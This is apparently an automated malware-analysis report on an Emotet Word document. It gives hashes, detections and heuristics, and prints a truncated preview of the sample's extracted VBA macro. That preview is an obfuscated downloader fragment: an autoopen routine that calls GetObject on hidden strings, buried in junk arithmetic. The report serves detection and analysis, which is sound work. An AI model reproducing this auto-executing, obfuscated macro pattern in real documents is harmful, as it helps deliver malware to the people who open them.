Emotet Office (OLE) malware analysis — malicious · d4c7d27e051b8d5a

MALICIOUS

Office (OLE)

223.4 KB Created: 2019-04-02 15:24:00 Authoring application: Microsoft Office Word First seen: 2019-12-09

MD5: 5c8b6874ff27a4ae9494d177941ef32b SHA-1: 8d84614813e158dc23c8af02bb633cbbc1276540 SHA-256: d4c7d27e051b8d5a5b012db73d7392ff5605cdb65a7a05b1bd4513896750fffe

222 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file was detected as malicious by ClamAV with the signature Doc.Downloader.Emotet-6922306-0, indicating a high likelihood of it being an Emotet variant. Heuristics confirm the presence of an auto-executing VBA macro (autoopen) that uses GetObject, a common technique for downloading and executing payloads. The VBA code is heavily obfuscated, but the overall behavior points to a downloader.

Heuristics 7

ClamAV: Doc.Downloader.Emotet-6922306-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-6922306-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 33944 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	33944 bytes
SHA-256: `84e0482e003ba4119fc28bf3f9c0b956118c7bf4f4cb6ea3795f5e44908d0340`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "uxXUwA" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "CCCAUG" Attribute VB_Base = "0{DA225CCD-A1D1-4054-962C-178FCEEDE2C2}{2C96C4D1-C9D7-4AED-9ECA-55CEE29041AD}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "wAQ4AAG" Attribute VB_Base = "0{9A831BDD-A1F4-4769-B993-181AD6FE82B8}{98579F07-5F6E-4BA5-A5D1-6E9615CD6674}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "DCAQAoQA" Function cZoAB4() If 922521435 = 192851129 Then qU1UAGoc = RUAocw + Int(546108065 * Asc(hAcABA) + FAABAUQB _ / 750093452) + XAAwAADA / CLng(UUZAkD) - (SUADGQAk - A11AAB / 121293747 - Tan _ (FBowAxc) + (rZw4cAU / CSng(Ec_A11) + _ 370614578 / Sgn(631284066) * (HAGwGU_A + CVar(465584512)))) End If If 435054564 = 818161751 Then kkDw_AA = zAXZAAcA + Int(545493911 * Asc(NX1kAD) + EAUABBA _ / 877746438) + nAkDxCB / CLng(JUBUoA) - (bBAAUA - BQADGAUA / 906233597 - Tan _ (wAAAA1) + (rwAZ_ZQU / CSng(WUQ4Zc) + _ 397302150 / Sgn(444886369) * (nAkZkDD + CVar(379243473)))) End If End Function Function fBcGAQ() If 250512773 = 195680977 Then SoABDoD = RBAGko + Int(186865208 * Asc(DZZADcBD) + YDUDAAD _ / 459123665) + lkA_AAGw / CLng(acwAkAAA) - (kAAUAw - nDxAGGD / 943216695 - Tan _ (TC1AAA) + (sCwUAAG / CSng(XwXBAX) + _ 190933911 / Sgn(449865101) * (DAQDXAAQ + CVar(830954521)))) End If If 220171445 = 266073721 Then m1DBBoAA = vCCAAAcw + Int(227740423 * Asc(aXB_XAXA) + RAZ1BA4A _ / 6062163) + mCAUAA / CLng(RcAAXAkZ) - (j4QCA4A - JcUXw_G / 768255806 - Tan _ (DAcZAAo1) + (CABQUU / CSng(oAAZ4QQ) + _ 848943287 / Sgn(939377856) * (NZ_AGxZA + CVar(125401684)))) End If If 958117308 = 378079 Then jBxABxB1 = SBQAG1Dw + Int(880373189 * Asc(sU4ADXAG) + lkAUkA4 _ / 407828553) + vXUBBAAC / CLng(mkoCQXU) - (qB4UAA - RQZZAA / 971871709 - Tan _ (kAw4AQAU) + (MGACAcw / CSng(P_QAk4) + _ 934764276 / Sgn(422199939) * (zUAAD_ + CVar(344229574)))) End If End Function Sub autoopen() DDAUok End Sub Function DDAUok() On Error Resume Next If 355240245 = 100129994 Then OUUXXAAk = fQAxoADA + Int(157204850 * Asc(iQDXkX) + vUDUooAk _ / 961538834) + PA1AAAAU / CLng(tDCwZGA) - (DUcA4D - WkAAU_ / 176689080 - Tan _ (PD11B_) + (B1AXDw / CSng(zAAA4UDQ) + _ 749369791 / Sgn(830719178) * (k_AQDDUD + CVar(63633416)))) End If If 74628408 = 382572562 Then bxDAAA4 = NAXXAwAA + Int(582183367 * Asc(icAAG1k) + F1xAAcA _ / 699891075) + rwDk1Qk1 / CLng(JCZAAAB4) - (zAQwAC - XBXwDAU / 309249239 - Tan _ (GQBxxk_A) + (UAA_UXoQ / CSng(SAwGAAQc) + _ 881748134 / Sgn(752212322) * (VU_QZC + CVar(301013295)))) End If If 381837829 = 101449969 Then UwDBwA = GAD_kBX + Int(795287431 * Asc(X1AoBAD) + RwZDwAUA _ / 698726230) + kAGB4wA / CLng(aADDCAGU) - (XZBkBw4 - mUQ_ZXAx / 609090801 - Tan _ (TDCAA4) + (IBAU1A / CSng(G1BAcAUG) + _ 128489058 / Sgn(758966201) * (KX4DAwA + CVar(89512383)))) End If Set a4AZAAZ_ = GetObject(CCCAUG.iQAAAA + wAQ4AAG.aoBA4ZB + CCCAUG.iQAAAA) If 152501303 = 350756035 Then iBAUkAA = zAAUUG + Int(718490214 * Asc(t4CB4AcG) + zAU11A _ / 580512185) + XQABAAwU / CLng(iAwAU_xQ) - (NUAGAxAB - pAAxkc / 803980014 - Tan _ (GDGXGZ) + (WxA1DQA_ / CSng(VAQAGCQ) + _ 194629198 / Sgn(789590622) * (kUGCUU + CVar(612864128)))) End If If 453891930 = 139417440 Then v_U_cxG = H1oGBD + Int(370963631 * Asc(TBkoBACQ) + BDAAUAwo _ / 663864062) + QcDUkAkB / CLng(WQZAAQx) - (ZAkGwGD_ - RZUAXAoQ / 169033843 - Tan _ (rUQZ4B) + (pUXAAA / CSng(PkxQcC) + _ 91786516 / Sgn(24242461) * (F1GAAooB + CVar(662779619)))) End If If 362589372 ... (truncated)

SHA-256: 84e0482e003ba4119fc28bf3f9c0b956118c7bf4f4cb6ea3795f5e44908d0340

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "uxXUwA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "CCCAUG"
Attribute VB_Base = "0{DA225CCD-A1D1-4054-962C-178FCEEDE2C2}{2C96C4D1-C9D7-4AED-9ECA-55CEE29041AD}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "wAQ4AAG"
Attribute VB_Base = "0{9A831BDD-A1F4-4769-B993-181AD6FE82B8}{98579F07-5F6E-4BA5-A5D1-6E9615CD6674}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "DCAQAoQA"
Function cZoAB4()
   If 922521435 = 192851129 Then
qU1UAGoc = RUAocw + Int(546108065 * Asc(hAcABA) + FAABAUQB _
/ 750093452) + XAAwAADA / CLng(UUZAkD) - (SUADGQAk - A11AAB / 121293747 - Tan _
(FBowAxc) + (rZw4cAU / CSng(Ec_A11) + _
370614578 / Sgn(631284066) * (HAGwGU_A + CVar(465584512))))
End If
   If 435054564 = 818161751 Then
kkDw_AA = zAXZAAcA + Int(545493911 * Asc(NX1kAD) + EAUABBA _
/ 877746438) + nAkDxCB / CLng(JUBUoA) - (bBAAUA - BQADGAUA / 906233597 - Tan _
(wAAAA1) + (rwAZ_ZQU / CSng(WUQ4Zc) + _
397302150 / Sgn(444886369) * (nAkZkDD + CVar(379243473))))
End If
End Function
Function fBcGAQ()
   If 250512773 = 195680977 Then
SoABDoD = RBAGko + Int(186865208 * Asc(DZZADcBD) + YDUDAAD _
/ 459123665) + lkA_AAGw / CLng(acwAkAAA) - (kAAUAw - nDxAGGD / 943216695 - Tan _
(TC1AAA) + (sCwUAAG / CSng(XwXBAX) + _
190933911 / Sgn(449865101) * (DAQDXAAQ + CVar(830954521))))
End If
   If 220171445 = 266073721 Then
m1DBBoAA = vCCAAAcw + Int(227740423 * Asc(aXB_XAXA) + RAZ1BA4A _
/ 6062163) + mCAUAA / CLng(RcAAXAkZ) - (j4QCA4A - JcUXw_G / 768255806 - Tan _
(DAcZAAo1) + (CABQUU / CSng(oAAZ4QQ) + _
848943287 / Sgn(939377856) * (NZ_AGxZA + CVar(125401684))))
End If
   If 958117308 = 378079 Then
jBxABxB1 = SBQAG1Dw + Int(880373189 * Asc(sU4ADXAG) + lkAUkA4 _
/ 407828553) + vXUBBAAC / CLng(mkoCQXU) - (qB4UAA - RQZZAA / 971871709 - Tan _
(kAw4AQAU) + (MGACAcw / CSng(P_QAk4) + _
934764276 / Sgn(422199939) * (zUAAD_ + CVar(344229574))))
End If
End Function
Sub autoopen()
DDAUok
End Sub
Function DDAUok()
On Error Resume Next
   If 355240245 = 100129994 Then
OUUXXAAk = fQAxoADA + Int(157204850 * Asc(iQDXkX) + vUDUooAk _
/ 961538834) + PA1AAAAU / CLng(tDCwZGA) - (DUcA4D - WkAAU_ / 176689080 - Tan _
(PD11B_) + (B1AXDw / CSng(zAAA4UDQ) + _
749369791 / Sgn(830719178) * (k_AQDDUD + CVar(63633416))))
End If
   If 74628408 = 382572562 Then
bxDAAA4 = NAXXAwAA + Int(582183367 * Asc(icAAG1k) + F1xAAcA _
/ 699891075) + rwDk1Qk1 / CLng(JCZAAAB4) - (zAQwAC - XBXwDAU / 309249239 - Tan _
(GQBxxk_A) + (UAA_UXoQ / CSng(SAwGAAQc) + _
881748134 / Sgn(752212322) * (VU_QZC + CVar(301013295))))
End If
   If 381837829 = 101449969 Then
UwDBwA = GAD_kBX + Int(795287431 * Asc(X1AoBAD) + RwZDwAUA _
/ 698726230) + kAGB4wA / CLng(aADDCAGU) - (XZBkBw4 - mUQ_ZXAx / 609090801 - Tan _
(TDCAA4) + (IBAU1A / CSng(G1BAcAUG) + _
128489058 / Sgn(758966201) * (KX4DAwA + CVar(89512383))))
End If
Set a4AZAAZ_ = GetObject(CCCAUG.iQAAAA + wAQ4AAG.aoBA4ZB + CCCAUG.iQAAAA)
   If 152501303 = 350756035 Then
iBAUkAA = zAAUUG + Int(718490214 * Asc(t4CB4AcG) + zAU11A _
/ 580512185) + XQABAAwU / CLng(iAwAU_xQ) - (NUAGAxAB - pAAxkc / 803980014 - Tan _
(GDGXGZ) + (WxA1DQA_ / CSng(VAQAGCQ) + _
194629198 / Sgn(789590622) * (kUGCUU + CVar(612864128))))
End If
   If 453891930 = 139417440 Then
v_U_cxG = H1oGBD + Int(370963631 * Asc(TBkoBACQ) + BDAAUAwo _
/ 663864062) + QcDUkAkB / CLng(WQZAAQx) - (ZAkGwGD_ - RZUAXAoQ / 169033843 - Tan _
(rUQZ4B) + (pUXAAA / CSng(PkxQcC) + _
91786516 / Sgn(24242461) * (F1GAAooB + CVar(662779619))))
End If
   If 362589372 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.